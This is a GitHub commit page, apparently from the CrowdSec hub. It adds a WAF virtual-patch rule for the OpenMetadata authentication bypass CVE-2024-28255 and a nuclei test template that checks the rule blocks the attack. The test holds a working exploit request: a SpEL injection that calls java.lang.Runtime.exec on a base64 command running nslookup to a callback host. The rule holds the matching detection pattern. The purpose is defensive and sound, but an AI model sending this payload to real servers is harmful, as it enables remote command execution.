-
Notifications
You must be signed in to change notification settings - Fork 162
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
* Add CVE-2024-28255 --------- Co-authored-by: GitHub Action <[email protected]>
- Loading branch information
1 parent
ffd0492
commit 1bcbeb1
Showing
6 changed files
with
187 additions
and
64 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
|
||
appsec-rules: | ||
- ./appsec-rules/crowdsecurity/base-config.yaml | ||
- ./appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml | ||
nuclei_template: test-CVE-2024-28255.yaml |
25 changes: 25 additions & 0 deletions
25
.appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
|
||
id: test-CVE-2024-28255 | ||
info: | ||
name: test-CVE-2024-28255 | ||
author: crowdsec | ||
severity: info | ||
description: test-CVE-2024-28255 testing | ||
tags: appsec-testing | ||
variables: | ||
callback: "{{interactsh-url}}" | ||
cmd: "nslookup {{callback}}" | ||
payload: '{{base64(cmd)}}' | ||
http: | ||
- raw: | ||
- | | ||
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1 | ||
Host: {{Hostname}} | ||
cookie-reuse: true | ||
matchers: | ||
- type: dsl | ||
condition: and | ||
dsl: | ||
- "status_code_1 == 403" | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,38 @@ | ||
|
||
name: crowdsecurity/vpatch-CVE-2024-28255 | ||
description: "OpenMetadata - Authentication Bypass (CVE-2024-28255)" | ||
rules: | ||
- and: | ||
- zones: | ||
- METHOD | ||
match: | ||
type: equals | ||
value: GET | ||
- zones: | ||
- URI | ||
transform: | ||
- lowercase | ||
- urldecode | ||
match: | ||
type: contains | ||
value: /api/v1;v1/users/login/events/subscriptions/validation/condition | ||
- zones: | ||
- URI_FULL | ||
transform: | ||
- lowercase | ||
match: | ||
type: contains | ||
value: "java.lang.runtime" | ||
|
||
labels: | ||
type: exploit | ||
service: http | ||
confidence: 3 | ||
spoofable: 0 | ||
behavior: "http:exploit" | ||
label: "OpenMetadata - Authentication Bypass" | ||
classification: | ||
- cve.CVE-2024-28255 | ||
- attack.T1595 | ||
- attack.T1190 | ||
- cwe.CWE-94 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,64 +1,65 @@ | ||
name: crowdsecurity/appsec-virtual-patching | ||
appsec-rules: | ||
- crowdsecurity/base-config | ||
- crowdsecurity/vpatch-env-access | ||
- crowdsecurity/vpatch-CVE-2023-40044 | ||
- crowdsecurity/vpatch-CVE-2017-9841 | ||
- crowdsecurity/vpatch-CVE-2020-11738 | ||
- crowdsecurity/vpatch-CVE-2022-27926 | ||
- crowdsecurity/vpatch-CVE-2022-35914 | ||
- crowdsecurity/vpatch-CVE-2022-46169 | ||
- crowdsecurity/vpatch-CVE-2023-20198 | ||
- crowdsecurity/vpatch-CVE-2023-22515 | ||
- crowdsecurity/vpatch-CVE-2023-33617 | ||
- crowdsecurity/vpatch-CVE-2023-34362 | ||
- crowdsecurity/vpatch-CVE-2023-3519 | ||
- crowdsecurity/vpatch-CVE-2023-42793 | ||
- crowdsecurity/vpatch-CVE-2023-50164 | ||
- crowdsecurity/vpatch-CVE-2023-38205 | ||
- crowdsecurity/vpatch-CVE-2023-24489 | ||
- crowdsecurity/vpatch-CVE-2021-3129 | ||
- crowdsecurity/vpatch-CVE-2021-22941 | ||
- crowdsecurity/vpatch-CVE-2019-12989 | ||
- crowdsecurity/vpatch-CVE-2022-44877 | ||
- crowdsecurity/vpatch-CVE-2018-10562 | ||
- crowdsecurity/vpatch-CVE-2023-6553 | ||
- crowdsecurity/vpatch-CVE-2018-1000861 | ||
- crowdsecurity/vpatch-CVE-2019-1003030 | ||
- crowdsecurity/vpatch-CVE-2022-22965 | ||
- crowdsecurity/vpatch-CVE-2023-23752 | ||
- crowdsecurity/vpatch-CVE-2023-49070 | ||
- crowdsecurity/vpatch-laravel-debug-mode | ||
- crowdsecurity/vpatch-CVE-2023-28121 | ||
- crowdsecurity/vpatch-CVE-2020-17496 | ||
- crowdsecurity/vpatch-CVE-2023-1389 | ||
- crowdsecurity/vpatch-CVE-2023-7028 | ||
- crowdsecurity/vpatch-CVE-2023-46805 | ||
- crowdsecurity/vpatch-CVE-2024-23897 | ||
- crowdsecurity/vpatch-CVE-2023-22527 | ||
- crowdsecurity/vpatch-CVE-2023-35078 | ||
- crowdsecurity/vpatch-CVE-2023-35082 | ||
- crowdsecurity/vpatch-CVE-2022-22954 | ||
- crowdsecurity/vpatch-CVE-2024-1212 | ||
- crowdsecurity/vpatch-symfony-profiler | ||
- crowdsecurity/vpatch-connectwise-auth-bypass | ||
- crowdsecurity/vpatch-CVE-2024-22024 | ||
- crowdsecurity/vpatch-CVE-2024-27198 | ||
- crowdsecurity/vpatch-CVE-2024-3273 | ||
- crowdsecurity/vpatch-CVE-2024-4577 | ||
- crowdsecurity/vpatch-CVE-2024-29849 | ||
- crowdsecurity/vpatch-CVE-2023-47218 | ||
- crowdsecurity/vpatch-git-config | ||
- crowdsecurity/vpatch-CVE-2024-32113 | ||
- crowdsecurity/vpatch-CVE-2024-3272 | ||
appsec-configs: | ||
- crowdsecurity/virtual-patching | ||
- crowdsecurity/appsec-default | ||
- crowdsecurity/virtual-patching | ||
- crowdsecurity/appsec-default | ||
appsec-rules: | ||
- crowdsecurity/base-config | ||
- crowdsecurity/vpatch-env-access | ||
- crowdsecurity/vpatch-CVE-2023-40044 | ||
- crowdsecurity/vpatch-CVE-2017-9841 | ||
- crowdsecurity/vpatch-CVE-2020-11738 | ||
- crowdsecurity/vpatch-CVE-2022-27926 | ||
- crowdsecurity/vpatch-CVE-2022-35914 | ||
- crowdsecurity/vpatch-CVE-2022-46169 | ||
- crowdsecurity/vpatch-CVE-2023-20198 | ||
- crowdsecurity/vpatch-CVE-2023-22515 | ||
- crowdsecurity/vpatch-CVE-2023-33617 | ||
- crowdsecurity/vpatch-CVE-2023-34362 | ||
- crowdsecurity/vpatch-CVE-2023-3519 | ||
- crowdsecurity/vpatch-CVE-2023-42793 | ||
- crowdsecurity/vpatch-CVE-2023-50164 | ||
- crowdsecurity/vpatch-CVE-2023-38205 | ||
- crowdsecurity/vpatch-CVE-2023-24489 | ||
- crowdsecurity/vpatch-CVE-2021-3129 | ||
- crowdsecurity/vpatch-CVE-2021-22941 | ||
- crowdsecurity/vpatch-CVE-2019-12989 | ||
- crowdsecurity/vpatch-CVE-2022-44877 | ||
- crowdsecurity/vpatch-CVE-2018-10562 | ||
- crowdsecurity/vpatch-CVE-2023-6553 | ||
- crowdsecurity/vpatch-CVE-2018-1000861 | ||
- crowdsecurity/vpatch-CVE-2019-1003030 | ||
- crowdsecurity/vpatch-CVE-2022-22965 | ||
- crowdsecurity/vpatch-CVE-2023-23752 | ||
- crowdsecurity/vpatch-CVE-2023-49070 | ||
- crowdsecurity/vpatch-laravel-debug-mode | ||
- crowdsecurity/vpatch-CVE-2023-28121 | ||
- crowdsecurity/vpatch-CVE-2020-17496 | ||
- crowdsecurity/vpatch-CVE-2023-1389 | ||
- crowdsecurity/vpatch-CVE-2023-7028 | ||
- crowdsecurity/vpatch-CVE-2023-46805 | ||
- crowdsecurity/vpatch-CVE-2024-23897 | ||
- crowdsecurity/vpatch-CVE-2023-22527 | ||
- crowdsecurity/vpatch-CVE-2023-35078 | ||
- crowdsecurity/vpatch-CVE-2023-35082 | ||
- crowdsecurity/vpatch-CVE-2022-22954 | ||
- crowdsecurity/vpatch-CVE-2024-1212 | ||
- crowdsecurity/vpatch-symfony-profiler | ||
- crowdsecurity/vpatch-connectwise-auth-bypass | ||
- crowdsecurity/vpatch-CVE-2024-22024 | ||
- crowdsecurity/vpatch-CVE-2024-27198 | ||
- crowdsecurity/vpatch-CVE-2024-3273 | ||
- crowdsecurity/vpatch-CVE-2024-4577 | ||
- crowdsecurity/vpatch-CVE-2024-29849 | ||
- crowdsecurity/vpatch-CVE-2023-47218 | ||
- crowdsecurity/vpatch-git-config | ||
- crowdsecurity/vpatch-CVE-2024-32113 | ||
- crowdsecurity/vpatch-CVE-2024-3272 | ||
- crowdsecurity/vpatch-CVE-2024-28255 | ||
author: crowdsecurity | ||
contexts: | ||
- crowdsecurity/appsec_base | ||
description: a generic virtual patching collection, suitable for most web servers. | ||
name: crowdsecurity/appsec-virtual-patching | ||
parsers: | ||
- crowdsecurity/appsec-logs | ||
- crowdsecurity/appsec-logs | ||
scenarios: | ||
- crowdsecurity/appsec-vpatch | ||
contexts: | ||
- crowdsecurity/appsec_base | ||
description: "a generic virtual patching collection, suitable for most web servers." | ||
author: crowdsecurity | ||
- crowdsecurity/appsec-vpatch |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters